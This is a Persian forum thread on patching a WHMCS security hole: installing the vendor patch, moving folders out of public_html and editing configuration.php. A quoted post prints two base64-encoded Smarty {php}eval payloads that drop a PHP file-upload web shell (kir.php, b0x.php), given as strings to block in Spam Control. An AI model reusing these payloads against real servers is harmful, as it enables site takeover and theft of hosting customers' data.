آموزش رفع مشکل امنیتی whmcs

نمایش نسخه قابل چاپ

نمایش 40 پست از این موضوع در یک صفحه

December 12th, 2011, 14:48
vps-baran.ir

پاسخ : آموزش رفع مشکل امنیتی whmcs

به جای username نام کاربری یوزر سیپنل رو بنویسید

معنی یوزر سیپنل چی میشه؟

---------- Post added at 02:48 PM ---------- Previous post was at 02:44 PM ----------

این خط رو چه کار کنم فایل های گفته شده رو بردم قبل از public_html الان این کد رو چه کار کنم

$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
December 12th, 2011, 14:51
majid67

پاسخ : آموزش رفع مشکل امنیتی whmcs

نقل قول:

نوشته اصلی توسط vps-baran.ir

به جای username نام کاربری یوزر سیپنل رو بنویسید

معنی یوزر سیپنل چی میشه؟

---------- Post added at 02:48 PM ---------- Previous post was at 02:44 PM ----------

این خط رو چه مار کنم فایل های گفته شده رو بردم قبل از public_html الان این کد رو چه کار کنم

$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";

نام کاربری ای که از طریق اون وارد cpanel میشید

این کدها رو داخل همون فایل configuration.php اضافه کن
December 12th, 2011, 15:22
vps-baran.ir

پاسخ : آموزش رفع مشکل امنیتی whmcs

مثلا این طوری باشه؟

/home/username/templates_c

یا این طوری ؟

/public_html/username/templates_c

---------- Post added at 03:22 PM ---------- Previous post was at 02:56 PM ----------

منتظر جواب هستم
December 12th, 2011, 16:22
majid67

پاسخ : آموزش رفع مشکل امنیتی whmcs

/home/username/templates_c
December 19th, 2011, 01:16
exactserver

پاسخ : آموزش رفع مشکل امنیتی whmcs

سلام، خوب این صفر ها که گذاشتید چی اینا هم باید صفر بشن یا خواستید اطلاعات فایل کانفیگ رو مخفی کنید؟
January 4th, 2012, 12:45
salar74_a

پاسخ : آموزش رفع مشکل امنیتی whmcs

دوستان ما همین کارو کردیم
ولی تیکت ها ذخیره نمیشند مشکل از چی میتونه باشه ؟
January 8th, 2012, 20:25
irmpmn

پاسخ : آموزش رفع مشکل امنیتی whmcs

به من هم حمله کرد یه هکر عرب ولی مچش رو گرفتم و مشکل حل شد. هنوزم میفرسته تیکت ...
February 19th, 2012, 15:08
dertgtr

پاسخ : آموزش رفع مشکل امنیتی whmcs

در قسمت مدیریت whmcs بعد Spam Control این دو کدی که دوستمون ( استارتر ) گفتن نبود این دوتا رو باید اضافه کنم یا روش بلوکه کردنش چیه ؟ نسخه من 4.1.2 هست
March 6th, 2012, 01:48
lived

پاسخ : آموزش رفع مشکل امنیتی whmcs

نقل قول:

نوشته اصلی توسط dertgtr

در قسمت مدیریت whmcs بعد Spam Control این دو کدی که دوستمون ( استارتر ) گفتن نبود این دوتا رو باید اضافه کنم یا روش بلوکه کردنش چیه ؟ نسخه من 4.1.2 هست

این کدها رو خودتون اضافه کنید در همون قسمت گفته شده به عنوان سابجکت
March 23rd, 2012, 22:58
tizparvaz

پاسخ : آموزش رفع مشکل امنیتی whmcs

نقل قول:

نوشته اصلی توسط maryam1

اول از همه نصب پچ امنیتی که در آدرس زیر هست
Security Patch - WHMCS Forums
و دومین کار انتقال سه پوشه ی templates_c و attachments و downloads به لوکال یعنی جایی که به صورت پیش فرض بکاپ گرفته شده از سیپنل ذخیره میشه
بعد برید داخل فایل
configuration.php
و اونو به این شکل در بیارید

کد PHP:

<?php $license = "Leased-00000000000000"; $db_host = "localhost"; $db_username = "0000000000000000000"; $db_password = "000000000000000000000"; $db_name = "0000000000000000000000000"; $cc_encryption_hash = "0000000000000000000000000000000000000"; $templates_compiledir = "/home/username/templates_c/"; $attachments_dir = "/home/username/attachments/"; $downloads_dir = "/home/username/downloads/";   ?>

به جای username نام کاربری یوزر سیپنل رو بنویسید
و کار آخر هم اینه که برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک

کد PHP:

{php}eval(base64_decode('  JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz   hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2   YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF   dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC   c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1   pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U   QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn   pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi   MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT   kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB   WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV   cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk   ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE   lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI   c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3   ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g   PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG  NvZGUpOw=='));{/php}

کد PHP:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq  MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS  aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2  SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ  anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp  QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3  blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs  SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl  eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI  ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J  K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJkb3dubG9hZHMvYjB4LnBocCIs  InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}

را بلوک کنید

به همین راحتی
دسترسی فایل کانفیگم بذارید رو 444

فقط پچ رو علاوه بر جایی که
whmcs
رو نصب کردید داخل
include
هم نصب کنید

بلاخره این کارو انجام بدیم بهتره یا ندیم
منظور ایشون dm800pvr این بوده که بعد انجام این کار هک شدن ؟

نمایش 40 پست از این موضوع در یک صفحه